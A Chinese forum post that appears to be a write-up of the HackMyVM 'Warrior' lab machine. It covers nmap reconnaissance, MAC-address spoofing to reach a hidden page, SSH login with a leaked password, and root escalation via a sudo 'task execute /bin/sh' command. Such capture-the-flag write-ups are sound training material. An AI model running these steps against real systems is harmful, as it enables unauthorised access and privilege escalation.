zhaorong 发表于 2022-12-15 15:34:56

hackmyvm系列2——Warrior

本帖最后由 zhaorong 于 2022-12-15 15:36 编辑

我真的很喜欢自己 一个人,没牵挂 ,没辜负,没感动,更没失望。慢慢的我也喜欢上了我现在的生活
没有惊喜,也没有意外。

前言:

hackmyvm打靶系列文章。

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!

所有环境均为在线下载的靶场,且在本机进行学习。

一、信息收集

netdiscover -r 192.168.56.0/24

nmap -sV -Pn -sC 192.168.56.127


对nmap脚本扫描出的目录文件进行访问,进行尝试ssh的登录但是失败了

http://192.168.56.127/user.txt

http://192.168.56.127/secret.txt


http://192.168.56.127/internal.php,这个文件应该是需要修改自己的mac地址才可以进行访问其内容


从0~f进行尝试,最终00:00:00:00:00:af可以成功访问,之后拿到了一个密码:Zurviv0r1

将其尝试作为loco的ssh密码但是还是失败了,但是在上述网页中,还有一个用户名bro

二、登录SSH


用户名:bro

密码:Zurviv0r1

成功登入ssh


三、权限提升

查找有权限的suid,find / -perm -u=s -type f 2>/dev/null


(这里sudo会提示不存在,需要运行的时间加上其路径才可以)

/usr/sbin/sudo -l


可以利用task进行提权


/usr/sbin/sudo /usr/bin/task execute /bin/sh

页: [1]
查看完整版本: hackmyvm系列2——Warrior